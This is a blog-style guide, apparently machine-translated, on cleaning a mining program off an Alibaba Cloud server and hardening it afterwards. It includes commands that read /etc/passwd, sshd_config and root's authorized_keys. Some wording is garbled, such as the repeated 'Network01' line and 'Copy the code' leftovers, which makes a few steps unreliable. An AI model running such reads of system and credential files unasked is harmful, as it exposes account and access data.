preface
Ali cloud suddenly received a message to remind, said the server malicious mining procedures, fortunately, this is a test server, before also did data backup, can rest assured to the whole, but still have to be careful before serious operation remember to back up
The process
1. Check the server load and CPU utilization, and determine the mining process
- Execute command:
topThere is a network01 thing that occupies 87% of the CPU, but I don’t see it in TMP
- The PID process id is determined from above. Check the directory where the PID process resides. Execute the command, and there is no clear location, you can see the executable file link
Ll /proc/PROCESS IDCopy the code
- Network01 = network01 = network01 = network01 = network01 = network01
- Forced kill mining process, delete mining program executable file Network01, afraid to delete the wrong backup (leave a regret);
kill -9 1459261
Copy the codeAfter killing the process, the top command checks that the CPU is down and back to normal
2, check whether there is a mining program address in the firewall of your server and remove the malicious address
iptables -L -n
Copy the code
3. Check whether the port security status is abnormal
netstat -aulntp
Copy the code
4. Check whether there are scheduled tasks added by the attacker in the scheduled tasks of the server, and process suspicious scheduled task files to prevent secondary intrusion
crontab -l
Copy the code
and
cat /etc/crontab
Copy the code
5. Check whether there are suspicious programs in the server boot option to ensure that there are no problems after the server restarts
cd /etc/init.d
Copy the code
cat /etc/rc.d/rc.local
Copy the code
6. Check whether the Linux system user has been added as another root administrator
Cat /etc/passwd # Username: password: User ID: Group ID: Home directory: login ShellCopy the code
7. Check whether the remote permission is enabled on the root serverPermitRootLoginShould be setno
cat /etc/ssh/sshd_config
Copy the code
8. Check whether there is a mining virus in the SSH public key to prevent a persistent backdoor
cat /root/.ssh/authorized_keys
Copy the code
9. The port security policy configured by the security group of Ali Cloud server opens port 80 and port 443, and permits IP addresses for other SSH ports. When logging in to the server, add the IP addresses to the background of Ali Cloud to prevent malicious login of the server as much as possible
10. Regularly check the security of the server to see if there is any mining behavior, check whether there is a Webshell backdoor, regularly upgrade the system version and repair vulnerabilities, and verify the second password of the background login of the system to prevent SQL injection vulnerabilities in the system. Prevent the mining virus from repeatedly infecting other servers on the Intranet
Also refer to dig ali cloud program practice documents: www.alibabacloud.com/help/zh/doc…
conclusion
The mining program deleted the mining program execution file, forced to kill the mining process, scheduled tasks, startup items and other items did not find anything suspicious, may be the hacker well… All in all, service security should do a good job to prevent malicious attacks on servers, and finally hope to refer to the article to help you!